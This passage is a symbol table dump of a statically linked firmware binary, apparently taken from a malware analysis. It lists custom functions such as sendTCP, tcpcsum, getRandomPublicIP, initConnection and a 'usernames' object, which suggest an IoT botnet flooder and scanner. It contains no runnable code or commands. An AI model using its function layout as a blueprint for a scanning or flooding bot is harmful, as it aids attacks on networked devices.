  1141.  1068: 0002123c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1142.  1069: 00000000     0 FILE    LOCAL  DEFAULT  ABS decodeh.c
  1143.  1070: 00021324     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1144.  1071: 00000000     0 FILE    LOCAL  DEFAULT  ABS encodeq.c
  1145.  1072: 000213dc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1146.  1073: 00000000     0 FILE    LOCAL  DEFAULT  ABS lengthq.c
  1147.  1074: 00021438     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1148.  1075: 00000000     0 FILE    LOCAL  DEFAULT  ABS decodea.c
  1149.  1076: 0002144c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1150.  1077: 00000000     0 FILE    LOCAL  DEFAULT  ABS read_etc_hosts_r.c
  1151.  1078: 00021528     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1152.  1079: 00021550     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1153.  1080: 0002155c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1154.  1081: 00021880     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1155.  1082: 00000000     0 FILE    LOCAL  DEFAULT  ABS tolower.c
  1156.  1083: 00021884     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1157.  1084: 000218b4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1158.  1085: 00000000     0 FILE    LOCAL  DEFAULT  ABS __C_ctype_tolower.c
  1159.  1086: 000318b0     0 NOTYPE  LOCAL  DEFAULT    9 $d
  1160.  1087: 00000000     0 FILE    LOCAL  DEFAULT  ABS sprintf.c
  1161.  1088: 000218b8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1162.  1089: 00000000     0 FILE    LOCAL  DEFAULT  ABS vsnprintf.c
  1163.  1090: 000218ec     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1164.  1091: 00000000     0 FILE    LOCAL  DEFAULT  ABS fgetc_unlocked.c
  1165.  1092: 0002199c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1166.  1093: 00021ac8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1167.  1094: 00000000     0 FILE    LOCAL  DEFAULT  ABS strcasecmp.c
  1168.  1095: 00021acc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1169.  1096: 00021b44     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1170.  1097: 00000000     0 FILE    LOCAL  DEFAULT  ABS encoded.c
  1171.  1098: 00021b48     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1172.  1099: 00000000     0 FILE    LOCAL  DEFAULT  ABS decoded.c
  1173.  1100: 00021bf0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1174.  1101: 00000000     0 FILE    LOCAL  DEFAULT  ABS lengthd.c
  1175.  1102: 00021cbc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1176.  1103: 00000000     0 FILE    LOCAL  DEFAULT  ABS _READ.c
  1177.  1104: 00021d08     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1178.  1105: 00000000     0 FILE    LOCAL  DEFAULT  ABS _rfill.c
  1179.  1106: 00021d64     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1180.  1107: 00000000     0 FILE    LOCAL  DEFAULT  ABS _trans2r.c
  1181.  1108: 00021d90     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1182.  1109: 00000000     0 FILE    LOCAL  DEFAULT  ABS /home/firmware/build/temp
  1183.  1110: 00021e4c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1184.  1111: 0002d000     0 NOTYPE  LOCAL  HIDDEN   ABS __fini_array_end
  1185.  1112: 0002d000     0 NOTYPE  LOCAL  HIDDEN   ABS __fini_array_start
  1186.  1113: 0002d000     0 NOTYPE  LOCAL  HIDDEN   ABS __init_array_end
  1187.  1114: 0002d000     0 NOTYPE  LOCAL  HIDDEN   ABS __preinit_array_end
  1188.  1115: 0002d000     0 NOTYPE  LOCAL  HIDDEN   ABS __init_array_start
  1189.  1116: 0002d000     0 NOTYPE  LOCAL  HIDDEN   ABS __preinit_array_start
  1190.  1117: 0002155c   808 FUNC    GLOBAL HIDDEN     2 __read_etc_hosts_r
  1191.  1118: 0001555c    24 FUNC    GLOBAL DEFAULT    2 longjmp
  1192.  1119: 00016e48    16 FUNC    GLOBAL DEFAULT    2 __libc_tcdrain
  1193.  1120: 000227c0     4 OBJECT  GLOBAL DEFAULT    4 __linuxthreads_pthread_th
  1194.  1121: 00013c3c    16 FUNC    GLOBAL HIDDEN     2 __GI_pthread_attr_getdeta
  1195.  1122: 00018b00    44 FUNC    GLOBAL HIDDEN     2 __GI_execve
  1196.  1123: 000159e0   228 FUNC    GLOBAL DEFAULT    2 __libc_sigaction
  1197.  1124: 00016380    28 FUNC    GLOBAL DEFAULT    2 __libc_pread
  1198.  1125: 00016d08    28 FUNC    GLOBAL DEFAULT    2 strcpy
  1199.  1126: 00015b94    80 FUNC    GLOBAL HIDDEN     2 __GI_fcntl64
  1200.  1127: 000099a0   748 FUNC    GLOBAL DEFAULT    2 recvLine
  1201.  1128: 0001720c    48 FUNC    GLOBAL HIDDEN     2 __GI_sigaddset
  1202.  1129: 00031544     4 OBJECT  GLOBAL HIDDEN     9 __GI___ctype_b
  1203.  1130: 0001b9e0     4 FUNC    GLOBAL DEFAULT    2 xdr_longlong_t
  1204.  1131: 0001dc90    44 FUNC    GLOBAL DEFAULT    2 bcmp
  1205.  1132: 000194e0   252 FUNC    GLOBAL HIDDEN     2 __GI_memchr
  1206.  1133: 00013c24    24 FUNC    GLOBAL HIDDEN     2 __GI_pthread_attr_setdeta
  1207.  1134: 0001df70    20 FUNC    GLOBAL HIDDEN     2 __GI___glibc_strerror_r
  1208.  1135: 00015054   252 FUNC    GLOBAL DEFAULT    2 pthread_mutex_timedlock
  1209.  1136: 00012ae0    76 FUNC    GLOBAL DEFAULT    2 waitpid
  1210.  1137: 00018ab4    24 FUNC    GLOBAL DEFAULT    2 __longjmp
  1211.  1138: 00015ce8    44 FUNC    GLOBAL DEFAULT    2 __libc_fsync
  1212.  1139: 0001f110   724 FUNC    GLOBAL HIDDEN     2 __open_nameservers
  1213.  1140: 0001f80c    12 FUNC    GLOBAL HIDDEN     2 __GI_fopen
  1214.  1141: 0001b2a4   288 FUNC    GLOBAL DEFAULT    2 xprt_register
  1215.  1142: 00015dd8    44 FUNC    GLOBAL DEFAULT    2 getrlimit
  1216.  1143: 00012d40    52 FUNC    WEAK   DEFAULT    2 pause
  1217.  1144: 00015e30    80 FUNC    GLOBAL DEFAULT    2 ioctl
  1218.  1145: 000147b0    80 FUNC    GLOBAL DEFAULT    2 pthread_cond_signal
  1219.  1146: 00037a98     4 OBJECT  GLOBAL DEFAULT   10 _stdio_openlist_use_count
  1220.  1147: 00014e58     8 FUNC    WEAK   HIDDEN     2 __pthread_mutexattr_destr
  1221.  1148: 00017e08   200 FUNC    GLOBAL HIDDEN     2 __GI_initstate_r
  1222.  1149: 00012018   304 FUNC    GLOBAL HIDDEN     2 __GI_sigaction
  1223.  1150: 000196e0   116 FUNC    GLOBAL DEFAULT    2 strtok_r
  1224.  1151: 00022aec   768 OBJECT  GLOBAL HIDDEN     4 __GI___C_ctype_toupper_da
  1225.  1152: 0001bef0    32 FUNC    GLOBAL HIDDEN     2 __GI_xdrmem_create
  1226.  1153: 000165dc    44 FUNC    GLOBAL HIDDEN     2 __GI_time
  1227.  1154: 00018b58    44 FUNC    GLOBAL DEFAULT    2 getgid
  1228.  1155: 00035a44     4 OBJECT  GLOBAL DEFAULT   10 __pthread_exit_code
  1229.  1156: 0001ca94    60 FUNC    GLOBAL DEFAULT    2 printf
  1230.  1157: 00031554     4 OBJECT  GLOBAL DEFAULT    9 stdout
  1231.  1158: 000179d0   124 FUNC    GLOBAL DEFAULT    2 random
  1232.  1159: 000207ac    48 FUNC    GLOBAL HIDDEN     2 __GI_strdup
  1233.  1160: 00015d68    24 FUNC    GLOBAL HIDDEN     2 __GI_getpagesize
  1234.  1161: 0001c77c    12 FUNC    GLOBAL DEFAULT    2 lrand48_r
  1235.  1162: 00015d14    40 FUNC    GLOBAL DEFAULT    2 getdtablesize
  1236.  1163: 00037a94     4 OBJECT  GLOBAL HIDDEN    10 __GI_h_errno
  1237.  1164: 00021438    20 FUNC    GLOBAL HIDDEN     2 __length_question
  1238.  1165: 0003154c     4 OBJECT  GLOBAL HIDDEN     9 __GI___ctype_toupper
  1239.  1166: 00021acc   124 FUNC    GLOBAL HIDDEN     2 __GI_strcasecmp
  1240.  1167: 00013294    20 FUNC    GLOBAL DEFAULT    2 __pthread_restart_new
  1241.  1168: 00021884    52 FUNC    GLOBAL HIDDEN     2 __GI_tolower
  1242.  1169: 00014e78    16 FUNC    WEAK   DEFAULT    2 pthread_mutexattr_gettype
  1243.  1170: 000168e4   260 FUNC    GLOBAL DEFAULT    2 putc_unlocked
  1244.  1171: 00013c1c     8 FUNC    GLOBAL DEFAULT    2 pthread_attr_destroy
  1245.  1172: 000129a8    84 FUNC    WEAK   DEFAULT    2 recv
  1246.  1173: 000129fc    76 FUNC    WEAK   DEFAULT    2 connect
  1247.  1174: 00039c48     4 OBJECT  GLOBAL DEFAULT   10 __linuxthreads_initial_re
  1248.  1175: 000213dc    92 FUNC    GLOBAL HIDDEN     2 __encode_question
  1249.  1176: 0001acf0    52 FUNC    GLOBAL DEFAULT    2 svcerr_auth
  1250.  1177: 000184c0   108 FUNC    GLOBAL HIDDEN     2 __GI___uClibc_fini
  1251.  1178: 000318e0     8 OBJECT  GLOBAL DEFAULT   10 numpids
  1252.  1179: 0002123c   232 FUNC    GLOBAL HIDDEN     2 __encode_header
  1253.  1180: 00013d1c    16 FUNC    WEAK   DEFAULT    2 pthread_attr_getstacksize
  1254.  1181: 000206e4   200 FUNC    GLOBAL HIDDEN     2 __GI_strncat
  1255.  1182: 00015224   316 FUNC    WEAK   DEFAULT    2 __pthread_once
  1256.  1183: 000138f4   188 FUNC    GLOBAL DEFAULT    2 pthread_create
  1257.  1184: 0001726c    24 FUNC    GLOBAL DEFAULT    2 sigemptyset
  1258.  1185: 00015150   200 FUNC    WEAK   HIDDEN     2 __pthread_mutex_lock
  1259.  1186: 00015658    76 FUNC    GLOBAL DEFAULT    2 pthread_getspecific
  1260.  1187: 0001191c    40 FUNC    GLOBAL DEFAULT    2 __new_sem_destroy
  1261.  1188: 0000f768   460 FUNC    GLOBAL DEFAULT    2 initConnection
  1262.  1189: 00017408    36 FUNC    GLOBAL DEFAULT    2 __sigdelset
  1263.  1190: 00013d2c    68 FUNC    GLOBAL HIDDEN     2 __GI_pthread_attr_init
  1264.  1191: 0001b0f0   164 FUNC    GLOBAL HIDDEN     2 __GI_svc_register
  1265.  1192: 000130b0    48 FUNC    GLOBAL DEFAULT    2 __pthread_find_self
  1266.  1193: 000184c0   108 FUNC    GLOBAL DEFAULT    2 __uClibc_fini
  1267.  1194: 000195f4   236 FUNC    GLOBAL DEFAULT    2 memrchr
  1268.  1195: 00015d3c    44 FUNC    GLOBAL DEFAULT    2 geteuid
  1269.  1196: 0001b0cc    36 FUNC    GLOBAL HIDDEN     2 __rpc_thread_svc_cleanup
  1270.  1197: 00020c68   528 FUNC    GLOBAL DEFAULT    2 inet_pton
  1271.  1198: 000218ec   176 FUNC    GLOBAL HIDDEN     2 __GI_vsnprintf
  1272.  1199: 00013d2c    68 FUNC    GLOBAL DEFAULT    2 pthread_attr_init
  1273.  1200: 00014028    92 FUNC    GLOBAL HIDDEN     2 __GI_pthread_setcanceltyp
  1274.  1201: 0001652c    44 FUNC    GLOBAL HIDDEN     2 __GI_setsid
  1275.  1202: 00014e78    16 FUNC    WEAK   DEFAULT    2 pthread_mutexattr_getkind
  1276.  1203: 000165ac    48 FUNC    WEAK   HIDDEN     2 __GI_sigsuspend
  1277.  1204: 0001dcc0     4 FUNC    GLOBAL DEFAULT    2 memmove
  1278.  1205: 0000d9e0  1732 FUNC    GLOBAL DEFAULT    2 sendTCP
  1279.  1206: 00014a38     8 FUNC    GLOBAL DEFAULT    2 pthread_exit
  1280.  1207: 00017308   184 FUNC    GLOBAL HIDDEN     2 __bsd_signal
  1281.  1208: 00011aa8   432 FUNC    GLOBAL DEFAULT    2 sem_timedwait
  1282.  1209: 00019754    64 FUNC    GLOBAL HIDDEN     2 __GI_strpbrk
  1283.  1210: 0001e638   276 FUNC    GLOBAL DEFAULT    2 pmap_set
  1284.  1211: 00021d90   188 FUNC    GLOBAL HIDDEN     2 __stdio_trans2r_o
  1285.  1212: 000171b0    48 FUNC    GLOBAL HIDDEN     2 __GI_setsockopt
  1286.  1213: 00015f9c    44 FUNC    GLOBAL DEFAULT    2 munmap
  1287.  1214: 00039ad8     4 OBJECT  GLOBAL DEFAULT   10 __libc_stack_end
  1288.  1215: 00035a38     4 OBJECT  GLOBAL DEFAULT   10 __pthread_manager_thread_
  1289.  1216: 00016420    44 FUNC    GLOBAL DEFAULT    2 sched_getparam
  1290.  1217: 0001f68c   384 FUNC    GLOBAL HIDDEN     2 __GI_fclose
  1291.  1218: 0001f5d0   188 FUNC    GLOBAL HIDDEN     2 __GI_wcsnrtombs
  1292.  1219: 000160c8    44 FUNC    GLOBAL HIDDEN     2 __GI_pipe
  1293.  1220: 00018f00   336 FUNC    GLOBAL HIDDEN     2 _uintmaxtostr
  1294.  1221: 00015f10    52 FUNC    GLOBAL DEFAULT    2 _longjmp
  1295.  1222: 00039bf8     4 OBJECT  GLOBAL HIDDEN    10 __exit_function_table
  1296.  1223: 0001a808    88 FUNC    GLOBAL HIDDEN     2 __GI_xdr_pmap
  1297.  1224: 00014290    28 FUNC    GLOBAL DEFAULT    2 pthread_condattr_setpshar
  1298.  1225: 0001bef0    32 FUNC    GLOBAL DEFAULT    2 xdrmem_create
  1299.  1226: 00015b20   116 FUNC    GLOBAL DEFAULT    2 __libc_fcntl
  1300.  1227: 00018008    12 FUNC    GLOBAL DEFAULT    2 atol
  1301.  1228: 00037a94     4 OBJECT  WEAK   DEFAULT   10 _h_errno
  1302.  1229: 0001aae0     8 FUNC    GLOBAL DEFAULT    2 xdr_des_block
  1303.  1230: 0001198c    84 FUNC    GLOBAL DEFAULT    2 __new_sem_init
  1304.  1231: 0000a644  1084 FUNC    GLOBAL DEFAULT    2 getRandomPublicIP
  1305.  1232: 0001aae8    48 FUNC    GLOBAL DEFAULT    2 xdr_opaque_auth
  1306.  1233: 0002199c   304 FUNC    GLOBAL DEFAULT    2 getc_unlocked
  1307.  1234: 00020884   256 FUNC    GLOBAL DEFAULT    2 clnt_spcreateerror
  1308.  1235: 00031544     4 OBJECT  GLOBAL DEFAULT    9 __ctype_b
  1309.  1236: 00011544    44 FUNC    GLOBAL DEFAULT    2 __pthread_manager_event
  1310.  1237: 00017cac   144 FUNC    GLOBAL HIDDEN     2 __GI_random_r
  1311.  1238: 00014d20    96 FUNC    GLOBAL DEFAULT    2 __fresetlockfiles
  1312.  1239: 0002d038    32 OBJECT  GLOBAL DEFAULT    9 usernames
  1313.  1240: 0002083c    28 FUNC    GLOBAL DEFAULT    2 clnt_perrno
  1314.  1241: 0001623c    56 FUNC    WEAK   DEFAULT    2 pwrite64
  1315.  1242: 00018ab4    24 FUNC    GLOBAL HIDDEN     2 __GI___longjmp
  1316.  1243: 00039dd4     0 NOTYPE  GLOBAL DEFAULT  ABS _bss_end__
  1317.  1244: 00014e60    24 FUNC    WEAK   HIDDEN     2 __pthread_mutexattr_setty
  1318.  1245: 00037a90     4 OBJECT  GLOBAL DEFAULT   10 errno
  1319.  1246: 00018b2c    44 FUNC    GLOBAL DEFAULT    2 getegid
  1320.  1247: 00013db0    32 FUNC    GLOBAL HIDDEN     2 __GI_pthread_attr_getsche
  1321.  1248: 00014800     4 FUNC    GLOBAL DEFAULT    2 __linuxthreads_create_eve
  1322.  1249: 000209a0   480 FUNC    GLOBAL HIDDEN     2 __GI_clnt_sperror
  1323.  1250: 00018bb0    88 FUNC    GLOBAL HIDDEN     2 __GI_sbrk
  1324.  1251: 00008cd0    64 FUNC    GLOBAL DEFAULT    2 zprintf
  1325.  1252: 00016fe4    44 FUNC    GLOBAL DEFAULT    2 __libc_accept
  1326.  1253: 00018570    92 FUNC    GLOBAL HIDDEN     2 __GI___uClibc_init
  1327.  1254: 0001c6f0   140 FUNC    GLOBAL DEFAULT    2 __heap_alloc_at
  1328.  1255: 0001a614   176 FUNC    GLOBAL HIDDEN     2 _create_xid
  1329.  1256: 0001c838   148 FUNC    GLOBAL HIDDEN     2 __exit_handler
  1330.  1257: 00018b00    44 FUNC    GLOBAL DEFAULT    2 execve
  1331.  1258: 0001303c    16 FUNC    GLOBAL DEFAULT    2 __libc_current_sigrtmax
  1332.  1259: 0001427c     8 FUNC    GLOBAL HIDDEN     2 __GI_pthread_condattr_des
  1333.  1260: 0001623c    56 FUNC    GLOBAL DEFAULT    2 __libc_pwrite64
  1334.  1261: 00014274     8 FUNC    GLOBAL DEFAULT    2 pthread_condattr_init
  1335.  1262: 00015d68    24 FUNC    GLOBAL DEFAULT    2 getpagesize
  1336.  1263: 00015d80    44 FUNC    WEAK   DEFAULT    2 getpid
  1337.  1264: 00013cf4    16 FUNC    WEAK   DEFAULT    2 pthread_attr_getstackaddr
  1338.  1265: 0001b8f8   232 FUNC    GLOBAL DEFAULT    2 xdr_u_hyper
  1339.  1266: 00031478     4 OBJECT  GLOBAL DEFAULT    9 __pthread_suspend
  1340.  1267: 00017bec   192 FUNC    GLOBAL DEFAULT    2 setstate_r
  1341.  1268: 00015eac   100 FUNC    WEAK   HIDDEN     2 __GI_lseek64
  1342.  1269: 00020294   148 FUNC    GLOBAL DEFAULT    2 fgets
  1343.  1270: 00009534   100 FUNC    GLOBAL DEFAULT    2 getHost
  1344.  1271: 00015d80    44 FUNC    GLOBAL DEFAULT    2 __libc_getpid
  1345.  1272: 0000938c   424 FUNC    GLOBAL DEFAULT    2 wildString
  1346.  1273: 00015820   204 FUNC    GLOBAL DEFAULT    2 pthread_key_delete
  1347.  1274: 00013dd0    84 FUNC    GLOBAL HIDDEN     2 __GI_pthread_attr_setsche
  1348.  1275: 0001df84   232 FUNC    GLOBAL DEFAULT    2 __xpg_strerror_r
  1349.  1276: 000189c4    36 FUNC    GLOBAL HIDDEN     2 __GI___rpc_thread_svc_fds
  1350.  1277: 00017790   244 FUNC    GLOBAL DEFAULT    2 __heap_free
  1351.  1278: 00013f38    40 FUNC    WEAK   DEFAULT    2 _pthread_cleanup_pop
  1352.  1279: 00015b94    80 FUNC    WEAK   DEFAULT    2 fcntl64
  1353.  1280: 00016120    48 FUNC    GLOBAL DEFAULT    2 prctl
  1354.  1281: 000124d4     8 FUNC    GLOBAL DEFAULT    2 __pthread_lock
  1355.  1282: 00016ad0     4 FUNC    GLOBAL DEFAULT    2 memcpy
  1356.  1283: 0001b028    68 FUNC    GLOBAL HIDDEN     2 __GI_svc_getreq
  1357.  1284: 000140e0   248 FUNC    GLOBAL DEFAULT    2 pthread_cancel
  1358.  1285: 00009918   136 FUNC    GLOBAL DEFAULT    2 makeRandomStr
  1359.  1286: 0001a6c4   324 FUNC    GLOBAL DEFAULT    2 pmap_getport
  1360.  1287: 0000aa80    96 FUNC    GLOBAL DEFAULT    2 getRandomIP
  1361.  1288: 000169e8    52 FUNC    GLOBAL HIDDEN     2 __GI_fputs_unlocked
  1362.  1289: 0001827c   148 FUNC    GLOBAL DEFAULT    2 execl
  1363.  1290: 00014e94    28 FUNC    GLOBAL HIDDEN     2 __pthread_mutexattr_setps
  1364.  1291: 00020294   148 FUNC    GLOBAL HIDDEN     2 __GI_fgets
  1365.  1292: 00035a34     4 OBJECT  GLOBAL DEFAULT   10 __pthread_initial_thread_
  1366.  1293: 0001aba4    92 FUNC    GLOBAL DEFAULT    2 svc_sendreply
  1367.  1294: 0001f818    72 FUNC    GLOBAL DEFAULT    2 perror
  1368.  1295: 00014e58     8 FUNC    GLOBAL DEFAULT    2 pthread_mutexattr_destroy
  1369.  1296: 0001e74c    40 FUNC    GLOBAL DEFAULT    2 _rpc_dtablesize
  1370.  1297: 000133c0   160 FUNC    GLOBAL DEFAULT    2 __pthread_reset_main_thre
  1371.  1298: 00016050    16 FUNC    WEAK   DEFAULT    2 creat
  1372.  1299: 00020328   320 FUNC    GLOBAL DEFAULT    2 _stdio_openlist_dec_use
  1373.  1300: 0000ae5c    76 FUNC    GLOBAL DEFAULT    2 sclose
  1374.  1301: 000164d0    48 FUNC    GLOBAL DEFAULT    2 __libc_select
  1375.  1302: 0001491c   284 FUNC    GLOBAL DEFAULT    2 __pthread_do_exit
  1376.  1303: 000130a0    16 FUNC    GLOBAL DEFAULT    2 pthread_equal
  1377.  1304: 0001d47c   152 FUNC    GLOBAL HIDDEN     2 _ppfs_init
  1378.  1305: 0001dc90    44 FUNC    GLOBAL HIDDEN     2 __GI_memcmp
  1379.  1306: 000166c8   180 FUNC    GLOBAL DEFAULT    2 puts
  1380.  1307: 00031548     4 OBJECT  GLOBAL HIDDEN     9 __GI___C_ctype_toupper
  1381.  1308: 0002199c   304 FUNC    GLOBAL HIDDEN     2 __GI_fgetc_unlocked
  1382.  1309: 00015fc8    44 FUNC    GLOBAL DEFAULT    2 __libc_nanosleep
  1383.  1310: 000083d8   304 FUNC    GLOBAL DEFAULT    2 trim
  1384.  1311: 0002064c   152 FUNC    GLOBAL HIDDEN     2 __GI_fgets_unlocked
  1385.  1312: 00015c90    44 FUNC    GLOBAL DEFAULT    2 dup2
  1386.  1313: 00014dc4    48 FUNC    WEAK   HIDDEN     2 __pthread_mutex_init
  1387.  1314: 0001302c    16 FUNC    GLOBAL DEFAULT    2 __libc_current_sigrtmin
  1388.  1315: 00031470     4 OBJECT  GLOBAL DEFAULT    9 __pthread_sig_debug
  1389.  1316: 0001191c    40 FUNC    WEAK   DEFAULT    2 sem_destroy
  1390.  1317: 0001a860   288 FUNC    GLOBAL HIDDEN     2 __GI__seterr_reply
  1391.  1318: 00021884    52 FUNC    GLOBAL DEFAULT    2 tolower
  1392.  1319: 00018b84    44 FUNC    GLOBAL DEFAULT    2 getuid
  1393.  1320: 0001bcc8   280 FUNC    GLOBAL HIDDEN     2 __GI_xdr_string
  1394.  1321: 00012ba4    60 FUNC    WEAK   DEFAULT    2 system
  1395.  1322: 00021528    52 FUNC    GLOBAL HIDDEN     2 __open_etc_hosts
  1396.  1323: 0001894c    40 FUNC    GLOBAL DEFAULT    2 __rpc_thread_svc_max_poll
  1397.  1324: 0001b2a4   288 FUNC    GLOBAL HIDDEN     2 __GI_xprt_register
  1398.  1325: 00013eec    76 FUNC    GLOBAL DEFAULT    2 __pthread_cleanup_push_de
  1399.  1326: 0001742c   340 FUNC    GLOBAL DEFAULT    2 malloc
  1400.  1327: 000105f0   248 FUNC    GLOBAL DEFAULT    2 __udivsi3
  1401.  1328: 00016e28    32 FUNC    GLOBAL DEFAULT    2 isatty
  1402.  1329: 00014414   516 FUNC    GLOBAL HIDDEN     2 __GI_pthread_cond_timedwa
  1403.  1330: 00015574    24 FUNC    GLOBAL DEFAULT    2 siglongjmp
  1404.  1331: 00013cc0    16 FUNC    GLOBAL DEFAULT    2 pthread_attr_getscope
  1405.  1332: 0001e54c   236 FUNC    GLOBAL HIDDEN     2 __GI_pmap_unset
  1406.  1333: 00018310   420 FUNC    GLOBAL DEFAULT    2 sleep
  1407.  1334: 00018008    12 FUNC    GLOBAL HIDDEN     2 __GI_atol
  1408.  1335: 00016478    44 FUNC    GLOBAL DEFAULT    2 sched_setscheduler
  1409.  1336: 00011d98   280 FUNC    GLOBAL DEFAULT    2 __new_sem_post
  1410.  1337: 000136b0   580 FUNC    GLOBAL DEFAULT    2 __pthread_initialize_mana
  1411.  1338: 000218ec   176 FUNC    GLOBAL DEFAULT    2 vsnprintf
  1412.  1339: 0001e904  2060 FUNC    GLOBAL HIDDEN     2 __dns_lookup
  1413.  1340: 0001639c    44 FUNC    WEAK   HIDDEN     2 __GI_read
  1414.  1341: 00012944   100 FUNC    WEAK   DEFAULT    2 recvfrom
  1415.  1342: 00011c58   320 FUNC    WEAK   DEFAULT    2 sem_wait
  1416.  1343: 0001bdf8   232 FUNC    GLOBAL DEFAULT    2 xdr_bytes
  1417.  1344: 0001ac50    80 FUNC    GLOBAL DEFAULT    2 svcerr_decode
  1418.  1345: 00012b68    60 FUNC    WEAK   DEFAULT    2 tcdrain
  1419.  1346: 000318b0     4 OBJECT  GLOBAL DEFAULT    9 __C_ctype_tolower
  1420.  1347: 00013cd0    16 FUNC    WEAK   DEFAULT    2 pthread_attr_getguardsize
  1421.  1348: 000318bc     0 NOTYPE  GLOBAL DEFAULT  ABS __bss_start__
  1422.  1349: 00017cac   144 FUNC    GLOBAL DEFAULT    2 random_r
  1423.  1350: 00015f10    52 FUNC    GLOBAL DEFAULT    2 __libc_longjmp
  1424.  1351: 0002d024     0 OBJECT  GLOBAL HIDDEN     9 __dso_handle
  1425.  1352: 00011d98   280 FUNC    WEAK   DEFAULT    2 sem_post
  1426.  1353: 0001644c    44 FUNC    GLOBAL DEFAULT    2 sched_getscheduler
  1427.  1354: 0001c8cc   260 FUNC    GLOBAL HIDDEN     2 __new_exitfn
  1428.  1355: 00013ffc    44 FUNC    GLOBAL DEFAULT    2 pthread_testcancel
  1429.  1356: 00039ab4    24 OBJECT  GLOBAL DEFAULT   10 __malloc_heap_lock
  1430.  1357: 000109fc   144 FUNC    GLOBAL DEFAULT    2 __pthread_manager_sighand
  1431.  1358: 000184b4    12 FUNC    GLOBAL DEFAULT    2 __libc_pthread_init
  1432.  1359: 0001c264   884 FUNC    GLOBAL DEFAULT    2 gethostbyname_r
  1433.  1360: 00013cf4    16 FUNC    GLOBAL DEFAULT    2 __pthread_attr_getstackad
  1434.  1361: 0000ac38   272 FUNC    GLOBAL DEFAULT    2 tcpcsum
  1435.  1362: 00014804     4 FUNC    GLOBAL DEFAULT    2 __linuxthreads_death_even
  1436.  1363: 000227dc     7 OBJECT  GLOBAL DEFAULT    4 __linuxthreads_version
  1437.  1364: 000090b8   388 FUNC    GLOBAL DEFAULT    2 fdpclose
  1438.  1365: 00013c1c     8 FUNC    GLOBAL HIDDEN     2 __GI_pthread_attr_destroy
  1439.  1366: 000171e0    44 FUNC    GLOBAL DEFAULT    2 socket
  1440.  1367: 00015c90    44 FUNC    GLOBAL HIDDEN     2 __GI_dup2
  1441.  1368: 000164d0    48 FUNC    WEAK   DEFAULT    2 select
  1442.  1369: 00013f9c    96 FUNC    WEAK   DEFAULT    2 _pthread_cleanup_pop_rest
  1443.  1370: 0001f560    80 FUNC    GLOBAL HIDDEN     2 __GI_wcrtomb
  1444.  1371: 00015b20   116 FUNC    GLOBAL HIDDEN     2 __GI___libc_fcntl
  1445.  1372: 00016ae0   156 FUNC    GLOBAL HIDDEN     2 __GI_memset
  1446.  1373: 00016fe4    44 FUNC    WEAK   HIDDEN     2 __GI_accept
  1447.  1374: 00020b80    28 FUNC    GLOBAL DEFAULT    2 clnt_perror
  1448.  1375: 00013d04    24 FUNC    GLOBAL DEFAULT    2 __pthread_attr_setstacksi
  1449.  1376: 0001667c    24 FUNC    GLOBAL DEFAULT    2 isspace
  1450.  1377: 00013c8c    16 FUNC    GLOBAL DEFAULT    2 pthread_attr_getinheritsc
  1451.  1378: 0001cccc    48 FUNC    GLOBAL HIDDEN     2 __stdio_seek
  1452.  1379: 000227e4     4 OBJECT  GLOBAL DEFAULT    4 __linuxthreads_pthread_ke
  1453.  1380: 00013460   136 FUNC    WEAK   DEFAULT    2 pthread_kill_other_thread
  1454.  1381: 000195dc    24 FUNC    WEAK   DEFAULT    2 mempcpy
  1455.  1382: 00016b80    28 FUNC    GLOBAL HIDDEN     2 __GI_strcoll
  1456.  1383: 00016650    44 FUNC    WEAK   HIDDEN     2 __GI_write
  1457.  1384: 00014e78    16 FUNC    GLOBAL HIDDEN     2 __pthread_mutexattr_getty
  1458.  1385: 0001b6b8     8 FUNC    GLOBAL DEFAULT    2 xdr_void
  1459.  1386: 000118c8    24 FUNC    GLOBAL DEFAULT    2 sem_unlink
  1460.  1387: 0003154c     4 OBJECT  GLOBAL DEFAULT    9 __ctype_toupper
  1461.  1388: 00016364    28 FUNC    GLOBAL DEFAULT    2 __libc_pwrite
  1462.  1389: 0001639c    44 FUNC    GLOBAL DEFAULT    2 __libc_read
  1463.  1390: 0001a808    88 FUNC    GLOBAL DEFAULT    2 xdr_pmap
  1464.  1391: 0001ad78    96 FUNC    GLOBAL DEFAULT    2 svcerr_progvers
  1465.  1392: 0001ab18   140 FUNC    GLOBAL HIDDEN     2 __GI_xdr_accepted_reply
  1466.  1393: 00022fdc  2906 OBJECT  GLOBAL HIDDEN     4 _string_syserrmsgs
  1467.  1394: 0001ac00    80 FUNC    GLOBAL DEFAULT    2 svcerr_noproc
  1468.  1395: 00013460   136 FUNC    GLOBAL DEFAULT    2 __pthread_kill_other_thre
  1469.  1396: 00015ff4    92 FUNC    WEAK   HIDDEN     2 __GI_open
  1470.  1397: 00016c00   264 FUNC    GLOBAL HIDDEN     2 __GI_strchr
  1471.  1398: 00039d98    16 OBJECT  GLOBAL HIDDEN    10 __searchdomain
  1472.  1399: 000139b0     4 FUNC    WEAK   DEFAULT    2 __pthread_initialize
  1473.  1400: 0001aa08   108 FUNC    GLOBAL HIDDEN     2 __GI_xdr_rejected_reply
  1474.  1401: 00014e60    24 FUNC    GLOBAL DEFAULT    2 __pthread_mutexattr_setki
  1475.  1402: 00012f10    76 FUNC    WEAK   DEFAULT    2 lseek
  1476.  1403: 00020b80    28 FUNC    GLOBAL HIDDEN     2 __GI_clnt_perror
